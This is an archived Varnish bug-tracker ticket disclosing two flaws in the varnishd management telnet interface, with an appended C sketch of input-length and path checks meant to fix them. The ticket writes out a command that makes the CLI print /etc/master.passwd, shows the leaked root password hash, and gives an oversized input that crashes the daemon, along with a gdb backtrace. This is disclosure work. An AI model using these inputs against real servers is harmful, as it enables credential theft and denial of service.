[Varnish] #83: varnishd dos via telnet interface + listing of root password hash
Varnish
varnish-bugs at projects.linpro.no
Fri Feb 9 07:53:52 CET 2007
#83: varnishd dos via telnet interface + listing of root password hash
-------------------------------+--------------------------------------------
Reporter: kokanin at gmail.com | Owner: phk
Type: defect | Status: new
Priority: normal | Milestone:
Component: varnishd | Version:
Severity: major | Keywords:
-------------------------------+--------------------------------------------
pkg_info | grep -i varni
varnish-1.0.2_2 The Varnish high-performance HTTP accelerator
uname -r
6.1-RELEASE-p10
./bin/varnishd/varnishd -a lort.dk:1234 -b lort.dk:80 -T lort.dk:1235
Listing of root password hash:
connect to the telnet port of the varnishd and send: vcl.load blah /etc/master.passwd
output:
106 189
Syntax error at
In VCL code Line 3 Pos 4
root:$1$O9wJ12Nm$IK.3lrgZJNCddlzMKt0f4/:0:0::0:0:Charlie &:/root:/bin/csh
crashing varnishd (DoS):
ping
99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
105 20
Too many parameters
# nc lort.dk 1235
# ps axuww | grep varnish
root 66894 0.0 0.2 1512 888 p0 S+ 12:55PM 0:00.00 grep varnish
# tail -n 1 /var/log/messages
Nov 9 12:55:42 lort kernel: pid 66830 (varnishd), uid 0: exited on signal 6 (core dumped)
[root@lort /usr/ports/www/varnish/varnish-1.0.2]# gdb -q ./bin/varnishd/.libs/varnishd -c /varnishd.core
(no debugging symbols found)...Core was generated by `varnishd'.
Program terminated with signal 6, Aborted.
Reading symbols from /usr/ports/www/varnish/varnish-1.0.2/lib/libvarnish/.libs/libvarnish.so.0...(no debugging symbols found)...done.
Loaded symbols for /usr/ports/www/varnish/varnish-1.0.2/lib/libvarnish/.libs/libvarnish.so.0
Reading symbols from /usr/ports/www/varnish/varnish-1.0.2/lib/libvcl/.libs/libvcl.so.0...(no debugging symbols found)...done.
Loaded symbols for /usr/ports/www/varnish/varnish-1.0.2/lib/libvcl/.libs/libvcl.so.0
Reading symbols from /usr/lib/libthr.so.2...(no debugging symbols found)...done.
Loaded symbols for /usr/lib/libthr.so.2
Reading symbols from /lib/libc.so.6...(no debugging symbols found)...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /libexec/ld-elf.so.1...(no debugging symbols found)...done.
Loaded symbols for /libexec/ld-elf.so.1
#0 0x2816d363 in kill () from /lib/libc.so.6
[New Thread 0x806f000 (LWP 100094)]
(gdb) x/i $pc
0x2816d363 <kill+7>: jb 0x2816d348 <sigprocmask+12>
(gdb) i r
eax 0x0 0
ecx 0xbfbfe4b0 -1077943120
edx 0x1 1
ebx 0x280b829c 671842972
esp 0xbfbfe4ac 0xbfbfe4ac
ebp 0xbfbfe4c8 0xbfbfe4c8
esi 0xbfbfe4e8 -1077943064
edi 0x807943b 134714427
eip 0x2816d363 0x2816d363
eflags 0x296 662
cs 0x33 51
ss 0x3b 59
ds 0x3b 59
es 0x3b 59
fs 0x3b 59
gs 0x1b 27
(gdb) bt
#0 0x2816d363 in kill () from /lib/libc.so.6
#1 0x280ad2d2 in raise () from /usr/lib/libthr.so.2
#2 0x2816c014 in abort () from /lib/libc.so.6
#3 0x280988f2 in lbv_assert () from /usr/ports/www/varnish/varnish-1.0.2/lib/libvarnish/.libs/libvarnish.so.0
#4 0x0805d871 in mgt_cli_callback ()
#5 0x0805eb31 in ev_schedule_one ()
#6 0x0805ecc5 in ev_schedule ()
#7 0x0805ca99 in mgt_run ()
#8 0x08063c7e in main ()
(gdb)
--
Ticket URL: <http://varnish.projects.linpro.no/ticket/83>
Varnish <http://varnish.projects.linpro.no/>
The Varnish HTTP Accelerator
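
Both problems in the report come from the management CLI acting on client input without limits: an arbitrary path reaches the VCL compiler, and an oversized command ends in an assertion (lbv_assert under mgt_cli_callback). A sketch of the two checks, as an added example that is not Varnish code and not taken from the ticket; the function names, the limits and the idea of a dedicated VCL directory are assumptions:

```c
/* Added example: hypothetical names and limits, not Varnish source. */
#ifndef _XOPEN_SOURCE
#define _XOPEN_SOURCE 700   /* for realpath() */
#endif
#include <limits.h>
#include <stdlib.h>
#include <string.h>

#define CLI_MAX_LINE 4096   /* assumed limit on one management command */
#define CLI_MAX_ARGS 8      /* assumed limit on parameters */
enum { CLI_E_TOOLONG = -1, CLI_E_TOOMANY = -2 };

/* Split buf[0..len) in place; buf must have room for len + 1 bytes.
 * Over-long lines and excess parameters yield an error code for the
 * client, never an assertion that takes the whole daemon down. */
int cli_split(char *buf, size_t len, char *argv[], int max_args)
{
    int argc = 0;
    char *p = buf;

    if (len >= CLI_MAX_LINE)
        return CLI_E_TOOLONG;
    buf[len] = '\0';
    for (;;) {
        while (*p == ' ' || *p == '\t')
            p++;
        if (*p == '\0')
            return argc;
        if (argc == max_args)
            return CLI_E_TOOMANY;
        argv[argc++] = p;
        while (*p != '\0' && *p != ' ' && *p != '\t')
            p++;
        if (*p != '\0')
            *p++ = '\0';
    }
}

/* Return 1 only if path resolves (symlinks and ".." included) to a
 * location strictly inside base_dir; resolved[] receives that path. */
int vcl_path_allowed(const char *base_dir, const char *path,
                     char resolved[PATH_MAX])
{
    char base[PATH_MAX];
    size_t n;

    if (realpath(base_dir, base) == NULL || realpath(path, resolved) == NULL)
        return 0;
    n = strlen(base);
    return strncmp(resolved, base, n) == 0 && resolved[n] == '/';
}
```

A caller would open the path returned in resolved[] rather than the client's string, and answer the client with an error status when either function refuses the input.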